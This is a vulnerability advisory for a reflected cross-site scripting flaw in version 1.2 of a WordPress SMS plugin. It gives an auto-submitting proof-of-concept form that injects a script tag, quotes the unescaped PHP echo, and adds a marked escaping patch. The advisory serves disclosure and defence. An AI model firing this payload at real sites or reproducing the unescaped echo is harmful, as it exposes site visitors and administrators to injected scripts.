___________________________________________________
|
| Exploit Title: WordPress Contact Form 7 International Sms Integration Plugin Cross Site Scripting
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage : https://wordpress.org/plugins/cf7-international-sms-integration/
| Software Link: https://downloads.wordpress.org/plugin/cf7-international-sms-integration.1.2.zip
| Version: 1.2
| Date: 2017 - 07 - 9
| Tested on: Kali-Linux /FireFox
|__________________________________________________

 Exploit :
 
<html>
<body onload="document.exploit.submit()">
   <form id="smslog-filter" method="get" action="http://Target/PATH/wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php">
   <input type="hidden" name="page" value=""/><script>alert(1)</script>" />
	<input type="hidden" name="tab" value="smslogs" />
	   
</form>
</body>
</html>

__________________________________________________

 Vulnerable method :
	 $_GET

 Vulnerable File :
     wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php

 Vulnerable code:
 
 
line 366 :
  <form id="smslog-filter" method="get" action="<?php echo $current_url; ?> "> 
            <input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
            <input type="hidden" name="tab" value="smslogs" />
            <?php $testListTable->display() ?> 
</form>
			  
				  
__________________________________________________

#patch:

To fix this vulnerability, pass the `page` request value through the htmlspecialchars() function before echoing it into the form.
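
The fix applied to the form from line 366, as an added example that is not the plugin's or the advisory author's code. The helper names `attr()` and `render_filter_form()` and the sample action URL are hypothetical, and encoding the action URL as well is an extra precaution assumed here, not a finding of the advisory.

```php
<?php
declare(strict_types=1);

/** Encode a value for output inside a quoted HTML attribute. */
function attr(string $value): string
{
    // ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
    // sequences instead of making htmlspecialchars() return an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hypothetical helper: the filter form with every dynamic value encoded. */
function render_filter_form(string $currentUrl, array $request): string
{
    // A missing or non-string parameter (for example page[]=x) becomes ''.
    $page = isset($request['page']) && is_string($request['page'])
        ? $request['page']
        : '';

    return '<form id="smslog-filter" method="get" action="' . attr($currentUrl) . '">' . "\n"
         . '    <input type="hidden" name="page" value="' . attr($page) . '" />' . "\n"
         . '    <input type="hidden" name="tab" value="smslogs" />' . "\n"
         . '</form>' . "\n";
}

// Constructed input: the "page" value from the advisory's proof of concept.
$request = ['page' => '"/><script>alert(1)</script>'];

// Constructed sample URL standing in for $current_url.
$html = render_filter_form('/wp-admin/admin.php', $request);
echo $html;

// The markup characters are emitted as entities, so the value cannot close
// the attribute or open a new element.
assert(strpos($html, '<script>') === false);
assert(strpos($html, 'value="&quot;/&gt;&lt;script&gt;alert(1)&lt;/script&gt;"') !== false);
```

Inside WordPress itself, esc_attr() and esc_url() are the core functions for escaping attribute values and URLs.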
__________________________________________________

Discovered By : M.R.S.L.Y 
__________________________________________________